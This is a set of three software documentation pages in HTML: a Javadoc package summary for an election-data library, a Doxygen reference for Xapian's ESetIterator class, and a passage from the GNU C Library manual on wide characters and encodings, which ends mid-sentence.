<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_101) on Sat Mar 17 00:03:28 EDT 2018 --> <title>corgis.election (Election: version 1)</title> <meta name="date" content="2018-03-17"> <link rel="stylesheet" type="text/css" href="../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="corgis.election (Election: version 1)"; } } catch(err) { } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../overview-summary.html">Overview</a></li> <li class="navBarCell1Rev">Package</li> <li>Class</li> <li><a href="package-use.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../deprecated-list.html">Deprecated</a></li> <li><a href="../../index-all.html">Index</a></li> <li><a href="../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev&nbsp;Package</li> <li><a href="../../corgis/election/domain/package-summary.html">Next&nbsp;Package</a></li> </ul> <ul class="navList"> <li><a href="../../index.html?corgis/election/package-summary.html" target="_top">Frames</a></li> <li><a href="package-summary.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 title="Package" class="title">Package&nbsp;corgis.election</h1> </div> <div class="contentContainer"> <ul class="blockList"> <li class="blockList"> <table class="typeSummary" border="0" cellpadding="3" cellspacing="0" summary="Class Summary table, listing classes, and an explanation"> <caption><span>Class Summary</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Class</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="../../corgis/election/ElectionLibrary.html" title="class in corgis.election">ElectionLibrary</a></td> <td class="colLast"> <div class="block">Data about the results was collected from CNN's 2016 election center.</div> </td> </tr> </tbody> </table> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../overview-summary.html">Overview</a></li> <li class="navBarCell1Rev">Package</li> <li>Class</li> <li><a href="package-use.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../deprecated-list.html">Deprecated</a></li> <li><a href="../../index-all.html">Index</a></li> <li><a href="../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev&nbsp;Package</li> <li><a href="../../corgis/election/domain/package-summary.html">Next&nbsp;Package</a></li> </ul> <ul class="navList"> <li><a href="../../index.html?corgis/election/package-summary.html" target="_top">Frames</a></li> <li><a href="package-summary.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
docs/apidoc/html/classXapian_1_1ESetIterator.html
ystk/debian-xapian-core
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Xapian: API Documentation: xapian-core: Xapian::ESetIterator Class Reference</title> <link href="doxygen.css" rel="stylesheet" type="text/css"> <link href="tabs.css" rel="stylesheet" type="text/css"> </head> <body bgcolor="#ffffff"> <!-- Generated by Doxygen 1.5.9 --> <script type="text/javascript"> <!-- function changeDisplayState (e){ var num=this.id.replace(/[^[0-9]/g,''); var button=this.firstChild; var sectionDiv=document.getElementById('dynsection'+num); if (sectionDiv.style.display=='none'||sectionDiv.style.display==''){ sectionDiv.style.display='block'; button.src='open.gif'; }else{ sectionDiv.style.display='none'; button.src='closed.gif'; } } function initDynSections(){ var divs=document.getElementsByTagName('div'); var sectionCounter=1; for(var i=0;i<divs.length-1;i++){ if(divs[i].className=='dynheader'&&divs[i+1].className=='dynsection'){ var header=divs[i]; var section=divs[i+1]; var button=header.firstChild; if (button!='IMG'){ divs[i].insertBefore(document.createTextNode(' '),divs[i].firstChild); button=document.createElement('img'); divs[i].insertBefore(button,divs[i].firstChild); } header.style.cursor='pointer'; header.onclick=changeDisplayState; header.id='dynheader'+sectionCounter; button.src='closed.gif'; section.id='dynsection'+sectionCounter; section.style.display='none'; section.style.marginLeft='14px'; sectionCounter++; } } } window.onload = initDynSections; --> </script> <div class="navigation" id="top"> <div class="tabs"> <ul> <li><a href="index.html"><span>Main&nbsp;Page</span></a></li> <li><a href="pages.html"><span>Related&nbsp;Pages</span></a></li> <li><a href="namespaces.html"><span>Namespaces</span></a></li> <li class="current"><a href="annotated.html"><span>Classes</span></a></li> <li><a href="files.html"><span>Files</span></a></li> </ul> </div> <div class="tabs"> <ul> <li><a href="annotated.html"><span>Class&nbsp;List</span></a></li> <li><a href="classes.html"><span>Class&nbsp;Index</span></a></li> <li><a href="hierarchy.html"><span>Class&nbsp;Hierarchy</span></a></li> <li><a href="functions.html"><span>Class&nbsp;Members</span></a></li> </ul> </div> <div class="navpath"><a class="el" href="namespaceXapian.html">Xapian</a>::<a class="el" href="classXapian_1_1ESetIterator.html">ESetIterator</a> </div> </div> <div class="contents"> <h1>Xapian::ESetIterator Class Reference</h1><!-- doxytag: class="Xapian::ESetIterator" -->Iterate through terms in the <a class="el" href="classXapian_1_1ESet.html" title="Class representing an ordered set of expand terms (an ESet).">ESet</a>. <a href="#_details">More...</a> <p> <p> <a href="classXapian_1_1ESetIterator-members.html">List of all members.</a><table border="0" cellpadding="0" cellspacing="0"> <tr><td></td></tr> <tr><td colspan="2"><br><h2>Public Types</h2></td></tr> <tr><td colspan="2"><div class="groupHeader"></div></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="anchor" name="8b9d7694b4030e995c921050855fdd5c"></a><!-- doxytag: member="Xapian::ESetIterator::iterator_category" ref="8b9d7694b4030e995c921050855fdd5c" args="" --> typedef <br class="typebreak"> std::bidirectional_iterator_tag&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classXapian_1_1ESetIterator.html#8b9d7694b4030e995c921050855fdd5c">iterator_category</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Allow use as an STL iterator. <br></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="anchor" name="e8f83b2d74b7d6df225200d4f5535457"></a><!-- doxytag: member="Xapian::ESetIterator::value_type" ref="e8f83b2d74b7d6df225200d4f5535457" args="" --> typedef std::string&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classXapian_1_1ESetIterator.html#e8f83b2d74b7d6df225200d4f5535457">value_type</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Allow use as an STL iterator. <br></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="anchor" name="2f7a416cb1933a156e7a451c0ce24862"></a><!-- doxytag: member="Xapian::ESetIterator::difference_type" ref="2f7a416cb1933a156e7a451c0ce24862" args="" --> typedef <a class="el" href="namespaceXapian.html#886bd8fd46134d4b488091cfd8a658ed">Xapian::termcount_diff</a>&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classXapian_1_1ESetIterator.html#2f7a416cb1933a156e7a451c0ce24862">difference_type</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Allow use as an STL iterator. <br></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="anchor" name="d3dd2f7ac77acea71189c6b2f92660d3"></a><!-- doxytag: member="Xapian::ESetIterator::pointer" ref="d3dd2f7ac77acea71189c6b2f92660d3" args="" --> typedef std::string *&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classXapian_1_1ESetIterator.html#d3dd2f7ac77acea71189c6b2f92660d3">pointer</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Allow use as an STL iterator. <br></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="anchor" name="a3a9801bb57c8d49be13633904951d29"></a><!-- doxytag: member="Xapian::ESetIterator::reference" ref="a3a9801bb57c8d49be13633904951d29" args="" --> typedef std::string &amp;&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classXapian_1_1ESetIterator.html#a3a9801bb57c8d49be13633904951d29">reference</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Allow use as an STL iterator. <br></td></tr> <tr><td colspan="2"><br><h2>Public Member Functions</h2></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="anchor" name="c61be6aa36fc2f6ebe5c4cc4865de473"></a><!-- doxytag: member="Xapian::ESetIterator::ESetIterator" ref="c61be6aa36fc2f6ebe5c4cc4865de473" args="()" --> &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classXapian_1_1ESetIterator.html#c61be6aa36fc2f6ebe5c4cc4865de473">ESetIterator</a> ()</td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Create an uninitialised iterator; this cannot be used, but is convenient syntactically. <br></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="anchor" name="2e9da71f680547c22406d2268b5ff1fe"></a><!-- doxytag: member="Xapian::ESetIterator::ESetIterator" ref="2e9da71f680547c22406d2268b5ff1fe" args="(const ESetIterator &amp;other)" --> &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classXapian_1_1ESetIterator.html#2e9da71f680547c22406d2268b5ff1fe">ESetIterator</a> (const <a class="el" href="classXapian_1_1ESetIterator.html">ESetIterator</a> &amp;other)</td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Copying is allowed (and is cheap). <br></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="anchor" name="48dab179f2b57c1b5e25f83598588331"></a><!-- doxytag: member="Xapian::ESetIterator::operator=" ref="48dab179f2b57c1b5e25f83598588331" args="(const ESetIterator &amp;other)" --> void&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classXapian_1_1ESetIterator.html#48dab179f2b57c1b5e25f83598588331">operator=</a> (const <a class="el" href="classXapian_1_1ESetIterator.html">ESetIterator</a> &amp;other)</td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Assignment is allowed (and is cheap). <br></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="anchor" name="14d2d57a48f2e7aed1580a6f782bed41"></a><!-- doxytag: member="Xapian::ESetIterator::operator++" ref="14d2d57a48f2e7aed1580a6f782bed41" args="()" --> <a class="el" href="classXapian_1_1ESetIterator.html">ESetIterator</a> &amp;&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classXapian_1_1ESetIterator.html#14d2d57a48f2e7aed1580a6f782bed41">operator++</a> ()</td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Advance the iterator. <br></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="anchor" name="dad0209772938f1d5c495ad722fb0dad"></a><!-- doxytag: member="Xapian::ESetIterator::operator++" ref="dad0209772938f1d5c495ad722fb0dad" args="(int)" --> <a class="el" href="classXapian_1_1ESetIterator.html">ESetIterator</a>&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classXapian_1_1ESetIterator.html#dad0209772938f1d5c495ad722fb0dad">operator++</a> (int)</td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Advance the iterator (postfix variant). <br></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="anchor" name="e1e2d498af7508403153a45ba813e439"></a><!-- doxytag: member="Xapian::ESetIterator::operator&#45;&#45;" ref="e1e2d498af7508403153a45ba813e439" args="()" --> <a class="el" href="classXapian_1_1ESetIterator.html">ESetIterator</a> &amp;&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classXapian_1_1ESetIterator.html#e1e2d498af7508403153a45ba813e439">operator--</a> ()</td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Decrement the iterator. <br></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="anchor" name="3a11724a059a1590e45c3a3b38cb43dc"></a><!-- doxytag: member="Xapian::ESetIterator::operator&#45;&#45;" ref="3a11724a059a1590e45c3a3b38cb43dc" args="(int)" --> <a class="el" href="classXapian_1_1ESetIterator.html">ESetIterator</a>&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classXapian_1_1ESetIterator.html#3a11724a059a1590e45c3a3b38cb43dc">operator--</a> (int)</td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Decrement the iterator (postfix variant). <br></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="anchor" name="ca6b55e068f22f1d4c5066f5087eb858"></a><!-- doxytag: member="Xapian::ESetIterator::operator*" ref="ca6b55e068f22f1d4c5066f5087eb858" args="() const " --> const std::string &amp;&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classXapian_1_1ESetIterator.html#ca6b55e068f22f1d4c5066f5087eb858">operator*</a> () const </td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Get the term for the current position. <br></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="anchor" name="7c3294162c194e248b4a5346414b7a6c"></a><!-- doxytag: member="Xapian::ESetIterator::get_weight" ref="7c3294162c194e248b4a5346414b7a6c" args="() const " --> <a class="el" href="namespaceXapian.html#cac12803afc9e24ee5141c119acb8884">Xapian::weight</a>&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classXapian_1_1ESetIterator.html#7c3294162c194e248b4a5346414b7a6c">get_weight</a> () const </td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Get the weight of the term at the current position. <br></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="anchor" name="6c2c1af1820e488bd2f8f53b67ad2dec"></a><!-- doxytag: member="Xapian::ESetIterator::get_description" ref="6c2c1af1820e488bd2f8f53b67ad2dec" args="() const " --> std::string&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classXapian_1_1ESetIterator.html#6c2c1af1820e488bd2f8f53b67ad2dec">get_description</a> () const </td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Return a string describing this object. <br></td></tr> <tr><td colspan="2"><br><h2>Friends</h2></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="anchor" name="2ca621ecf6f96ce65281a2b03eb70c7d"></a><!-- doxytag: member="Xapian::ESetIterator::operator==" ref="2ca621ecf6f96ce65281a2b03eb70c7d" args="(const ESetIterator &amp;a, const ESetIterator &amp;b)" --> bool&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classXapian_1_1ESetIterator.html#2ca621ecf6f96ce65281a2b03eb70c7d">operator==</a> (const <a class="el" href="classXapian_1_1ESetIterator.html">ESetIterator</a> &amp;a, const <a class="el" href="classXapian_1_1ESetIterator.html">ESetIterator</a> &amp;b)</td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Equality test for <a class="el" href="classXapian_1_1ESetIterator.html" title="Iterate through terms in the ESet.">ESetIterator</a> objects. <br></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top"><a class="anchor" name="9bdc971a181b8bfb8d920f01df389715"></a><!-- doxytag: member="Xapian::ESetIterator::operator!=" ref="9bdc971a181b8bfb8d920f01df389715" args="(const ESetIterator &amp;a, const ESetIterator &amp;b)" --> bool&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classXapian_1_1ESetIterator.html#9bdc971a181b8bfb8d920f01df389715">operator!=</a> (const <a class="el" href="classXapian_1_1ESetIterator.html">ESetIterator</a> &amp;a, const <a class="el" href="classXapian_1_1ESetIterator.html">ESetIterator</a> &amp;b)</td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Inequality test for <a class="el" href="classXapian_1_1ESetIterator.html" title="Iterate through terms in the ESet.">ESetIterator</a> objects. <br></td></tr> </table> <hr><a name="_details"></a><h2>Detailed Description</h2> Iterate through terms in the <a class="el" href="classXapian_1_1ESet.html" title="Class representing an ordered set of expand terms (an ESet).">ESet</a>. <hr>The documentation for this class was generated from the following file:<ul> <li>xapian/<a class="el" href="enquire_8h.html">enquire.h</a></ul> </div> <hr> <address><small> Documentation for Xapian (version 1.2.3).<br> Generated on 24 Aug 2010 by <a href="http://www.doxygen.org/">Doxygen 1.5.9</a>. </small></address> </body> </html>
share/doc/gcc-linaro-arm-linux-gnueabihf/html/libc/Extended-Char-Intro.html
eckucukoglu/arm-linux-gnueabihf
<html lang="en"> <head> <title>Extended Char Intro - The GNU C Library</title> <meta http-equiv="Content-Type" content="text/html"> <meta name="description" content="The GNU C Library"> <meta name="generator" content="makeinfo 4.13"> <link title="Top" rel="start" href="index.html#Top"> <link rel="up" href="Character-Set-Handling.html#Character-Set-Handling" title="Character Set Handling"> <link rel="next" href="Charset-Function-Overview.html#Charset-Function-Overview" title="Charset Function Overview"> <link href="http://www.gnu.org/software/texinfo/" rel="generator-home" title="Texinfo Homepage"> <!-- This file documents the GNU C Library. This is `The GNU C Library Reference Manual', for version 2.19-2014.08 (crosstool-NG linaro-1.13.1-4.9-2014.09 - Linaro GCC 4.9-2014.09). Copyright (C) 1993--2014 Free Software Foundation, Inc. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with the Invariant Sections being ``Free Software Needs Free Documentation'' and ``GNU Lesser General Public License'', the Front-Cover texts being ``A GNU Manual'', and with the Back-Cover Texts as in (a) below. A copy of the license is included in the section entitled "GNU Free Documentation License". (a) The FSF's Back-Cover Text is: ``You have the freedom to copy and modify this GNU manual. Buying copies from the FSF supports it in developing GNU and promoting software freedom.''--> <meta http-equiv="Content-Style-Type" content="text/css"> <style type="text/css"><!-- pre.display { font-family:inherit } pre.format { font-family:inherit } pre.smalldisplay { font-family:inherit; font-size:smaller } pre.smallformat { font-family:inherit; font-size:smaller } pre.smallexample { font-size:smaller } pre.smalllisp { font-size:smaller } span.sc { font-variant:small-caps } span.roman { font-family:serif; font-weight:normal; } span.sansserif { font-family:sans-serif; font-weight:normal; } --></style> </head> <body> <div class="node"> <a name="Extended-Char-Intro"></a> <p> Next:&nbsp;<a rel="next" accesskey="n" href="Charset-Function-Overview.html#Charset-Function-Overview">Charset Function Overview</a>, Up:&nbsp;<a rel="up" accesskey="u" href="Character-Set-Handling.html#Character-Set-Handling">Character Set Handling</a> <hr> </div> <h3 class="section">6.1 Introduction to Extended Characters</h3> <p>A variety of solutions is available to overcome the differences between character sets with a 1:1 relation between bytes and characters and character sets with ratios of 2:1 or 4:1. The remainder of this section gives a few examples to help understand the design decisions made while developing the functionality of the C&nbsp;library<!-- /@w -->. <p><a name="index-internal-representation-650"></a>A distinction we have to make right away is between internal and external representation. <dfn>Internal representation</dfn> means the representation used by a program while keeping the text in memory. External representations are used when text is stored or transmitted through some communication channel. Examples of external representations include files waiting in a directory to be read and parsed. <p>Traditionally there has been no difference between the two representations. It was equally comfortable and useful to use the same single-byte representation internally and externally. This comfort level decreases with more and larger character sets. <p>One of the problems to overcome with the internal representation is handling text that is externally encoded using different character sets. Assume a program that reads two texts and compares them using some metric. The comparison can be usefully done only if the texts are internally kept in a common format. <p><a name="index-wide-character-651"></a>For such a common format (= character set) eight bits are certainly no longer enough. So the smallest entity will have to grow: <dfn>wide characters</dfn> will now be used. Instead of one byte per character, two or four will be used instead. (Three are not good to address in memory and more than four bytes seem not to be necessary). <p><a name="index-Unicode-652"></a><a name="index-ISO-10646-653"></a>As shown in some other part of this manual, <!-- !!! Ahem, wide char string functions are not yet covered - drepper --> a completely new family has been created of functions that can handle wide character texts in memory. The most commonly used character sets for such internal wide character representations are Unicode and ISO&nbsp;10646<!-- /@w --> (also known as UCS for Universal Character Set). Unicode was originally planned as a 16-bit character set; whereas, ISO&nbsp;10646<!-- /@w --> was designed to be a 31-bit large code space. The two standards are practically identical. They have the same character repertoire and code table, but Unicode specifies added semantics. At the moment, only characters in the first <code>0x10000</code> code positions (the so-called Basic Multilingual Plane, BMP) have been assigned, but the assignment of more specialized characters outside this 16-bit space is already in progress. A number of encodings have been defined for Unicode and ISO&nbsp;10646<!-- /@w --> characters: <a name="index-UCS_002d2-654"></a><a name="index-UCS_002d4-655"></a><a name="index-UTF_002d8-656"></a><a name="index-UTF_002d16-657"></a>UCS-2 is a 16-bit word that can only represent characters from the BMP, UCS-4 is a 32-bit word than can represent any Unicode and ISO&nbsp;10646<!-- /@w --> character, UTF-8 is an ASCII compatible encoding where ASCII characters are represented by ASCII bytes and non-ASCII characters by sequences of 2-6 non-ASCII bytes, and finally UTF-16 is an extension of UCS-2 in which pairs of certain UCS-2 words can be used to encode non-BMP characters up to <code>0x10ffff</code>. <p>To represent wide characters the <code>char</code> type is not suitable. For this reason the ISO&nbsp;C<!-- /@w --> standard introduces a new type that is designed to keep one character of a wide character string. To maintain the similarity there is also a type corresponding to <code>int</code> for those functions that take a single wide character. <!-- stddef.h --> <!-- ISO --> <div class="defun"> &mdash; Data type: <b>wchar_t</b><var><a name="index-wchar_005ft-658"></a></var><br> <blockquote><p>This data type is used as the base type for wide character strings. In other words, arrays of objects of this type are the equivalent of <code>char[]</code> for multibyte character strings. The type is defined in <samp><span class="file">stddef.h</span></samp>. <p>The ISO&nbsp;C90<!-- /@w --> standard, where <code>wchar_t</code> was introduced, does not say anything specific about the representation. It only requires that this type is capable of storing all elements of the basic character set. Therefore it would be legitimate to define <code>wchar_t</code> as <code>char</code>, which might make sense for embedded systems. <p>But in the GNU C Library <code>wchar_t</code> is always 32 bits wide and, therefore, capable of representing all UCS-4 values and, therefore, covering all of ISO&nbsp;10646<!-- /@w -->. Some Unix systems define <code>wchar_t</code> as a 16-bit type and thereby follow Unicode very strictly. This definition is perfectly fine with the standard, but it also means that to represent all characters from Unicode and ISO&nbsp;10646<!-- /@w --> one has to use UTF-16 surrogate characters, which is in fact a multi-wide-character encoding. But resorting to multi-wide-character encoding contradicts the purpose of the <code>wchar_t</code> type. </p></blockquote></div> <!-- wchar.h --> <!-- ISO --> <div class="defun"> &mdash; Data type: <b>wint_t</b><var><a name="index-wint_005ft-659"></a></var><br> <blockquote><p><code>wint_t</code> is a data type used for parameters and variables that contain a single wide character. As the name suggests this type is the equivalent of <code>int</code> when using the normal <code>char</code> strings. The types <code>wchar_t</code> and <code>wint_t</code> often have the same representation if their size is 32 bits wide but if <code>wchar_t</code> is defined as <code>char</code> the type <code>wint_t</code> must be defined as <code>int</code> due to the parameter promotion. <p><a name="index-wchar_002eh-660"></a>This type is defined in <samp><span class="file">wchar.h</span></samp> and was introduced in Amendment&nbsp;1<!-- /@w --> to ISO&nbsp;C90<!-- /@w -->. </p></blockquote></div> <p>As there are for the <code>char</code> data type macros are available for specifying the minimum and maximum value representable in an object of type <code>wchar_t</code>. <!-- wchar.h --> <!-- ISO --> <div class="defun"> &mdash; Macro: wint_t <b>WCHAR_MIN</b><var><a name="index-WCHAR_005fMIN-661"></a></var><br> <blockquote><p>The macro <code>WCHAR_MIN</code> evaluates to the minimum value representable by an object of type <code>wint_t</code>. <p>This macro was introduced in Amendment&nbsp;1<!-- /@w --> to ISO&nbsp;C90<!-- /@w -->. </p></blockquote></div> <!-- wchar.h --> <!-- ISO --> <div class="defun"> &mdash; Macro: wint_t <b>WCHAR_MAX</b><var><a name="index-WCHAR_005fMAX-662"></a></var><br> <blockquote><p>The macro <code>WCHAR_MAX</code> evaluates to the maximum value representable by an object of type <code>wint_t</code>. <p>This macro was introduced in Amendment&nbsp;1<!-- /@w --> to ISO&nbsp;C90<!-- /@w -->. </p></blockquote></div> <p>Another special wide character value is the equivalent to <code>EOF</code>. <!-- wchar.h --> <!-- ISO --> <div class="defun"> &mdash; Macro: wint_t <b>WEOF</b><var><a name="index-WEOF-663"></a></var><br> <blockquote><p>The macro <code>WEOF</code> evaluates to a constant expression of type <code>wint_t</code> whose value is different from any member of the extended character set. <p><code>WEOF</code> need not be the same value as <code>EOF</code> and unlike <code>EOF</code> it also need <em>not</em> be negative. In other words, sloppy code like <pre class="smallexample"> { int c; ... while ((c = getc (fp)) &lt; 0) ... } </pre> <p class="noindent">has to be rewritten to use <code>WEOF</code> explicitly when wide characters are used: <pre class="smallexample"> { wint_t c; ... while ((c = wgetc (fp)) != WEOF) ... } </pre> <p><a name="index-wchar_002eh-664"></a>This macro was introduced in Amendment&nbsp;1<!-- /@w --> to ISO&nbsp;C90<!-- /@w --> and is defined in <samp><span class="file">wchar.h</span></samp>. </p></blockquote></div> <p>These internal representations present problems when it comes to storing and transmittal. Because each single wide character consists of more than one byte, they are affected by byte-ordering. Thus, machines with different endianesses would see different values when accessing the same data. This byte ordering concern also applies for communication protocols that are all byte-based and therefore require that the sender has to decide about splitting the wide character in bytes. A last (but not least important) point is that wide characters often require more storage space than a customized byte-oriented character set. <p><a name="index-multibyte-character-665"></a><a name="index-EBCDIC-666"></a>For all the above reasons, an external encoding that is different from the internal encoding is often used if the latter is UCS-2 or UCS-4. The external encoding is byte-based and can be chosen appropriately for the environment and for the texts to be handled. A variety of different character sets can be used for this external encoding (information that will not be exhaustively presented here&ndash;instead, a description of the major groups will suffice). All of the ASCII-based character sets fulfill one requirement: they are "filesystem safe." This means that the character <code>'/'</code> is used in the encoding <em>only</em> to represent itself. Things are a bit different for character sets like EBCDIC (Extended Binary Coded Decimal Interchange Code, a character set family used by IBM), but if the operating system does not understand EBCDIC directly the parameters-to-system calls have to be converted first anyhow. <ul> <li>The simplest character sets are single-byte character sets. There can be only up to 256 characters (for 8&nbsp;bit<!-- /@w --> character sets), which is not sufficient to cover all languages but might be sufficient to handle a specific text. Handling of a 8&nbsp;bit<!-- /@w --> character sets is simple. This is not true for other kinds presented later, and therefore, the application one uses might require the use of 8&nbsp;bit<!-- /@w --> character sets. <p><a name="index-ISO-2022-667"></a><li>The ISO&nbsp;2022<!-- /@w --> standard defines a mechanism for extended character sets where one character <em>can</em> be represented by more than one byte. This is achieved by associating a state with the text. Characters that can be used to change the state can be embedded in the text. Each byte in the text might have a different interpretation in each state. The state might even influence whether a given byte stands for a character on its own or whether it has to be combined with some more bytes. <p><a name="index-EUC-668"></a><a name="index-Shift_005fJIS-669"></a><a name="index-SJIS-670"></a>In most uses of ISO&nbsp;2022<!-- /@w --> the defined character sets do not allow state changes that cover more than the next character. This has the big advantage that whenever one can identify the beginning of the byte sequence of a character one can interpret a text correctly. Examples of character sets using this policy are the various EUC character sets (used by Sun's operating systems, EUC-JP, EUC-KR, EUC-TW, and EUC-CN) or Shift_JIS (SJIS, a Japanese encoding). <p>But there are also character sets using a state that is valid for more than one character and has to be changed by another byte sequence. Examples for this are ISO-2022-JP, ISO-2022-KR, and ISO-2022-CN. <li><a name="index-ISO-6937-671"></a>Early attempts to fix 8 bit character sets for other languages using the Roman alphabet lead to character sets like ISO&nbsp;6937<!-- /@w -->. Here bytes representing characters like the acute accent do not produce output themselves: one has to combine them with other characters to get the desired result. For example, the byte sequence <code>0xc2 0x61</code> (non-spacing acute accent, followed by lower-case `a') to get the &ldquo;small a with acute&rdquo; character. To get the acute accent character on its own, one has to write <code>0xc2 0x20</code> (the non-spacing acute followed by a space). <p>Character sets like ISO&nbsp;6937<!-- /@w --> are used in some embedded systems such as teletex. <li><a name="index-UTF_002d8-672"></a>Instead of converting the Unicode or ISO&nbsp;10646<!-- /@w --> text used internally, it is often also sufficient to simply use an encoding different than UCS-2/UCS-4. The Unicode and ISO&nbsp;10646<!-- /@w --> standards even specify such an encoding: UTF-8. This encoding is able to represent all of ISO&nbsp;10646<!-- /@w --> 31 bits in a byte string of length one to six. <p><a name="index-UTF_002d7-673"></a>There were a few other attempts to encode ISO&nbsp;10646<!-- /@w --> such as UTF-7, but UTF-8 is today the only encoding that should be used. In fact, with any luck UTF-8 will soon be the only external encoding that has to be supported. It proves to be universally usable and its only disadvantage is that it favors Roman languages by making the byte string representation of other scripts (Cyrillic, Greek, Asian scripts) longer than necessary if using a specific character set for these scripts. Methods like the Unicode compression scheme can alleviate these problems. </ul> <p>The question remaining is: how to select the character set or encoding to use. The answer: you cannot decide about it yourself, it is decided by the developers of the system or the majority of the users. Since the goal is interoperability one has to use whatever the other people one works with use. If there are no constraints, the selection is based on the requirements the expected circle of users will have. In other words, if a project is expected to be used in only, say, Russia it is fine to use KOI8-R or a similar character set. But if at the same time people from, say, Greece are participating one should use a character set that allows all people to collaborate. <p>The most widely useful solution seems to be: go with the most general character set, namely ISO&nbsp;10646<!-- /@w -->. Use UTF-8 as the external encoding and problems about users not 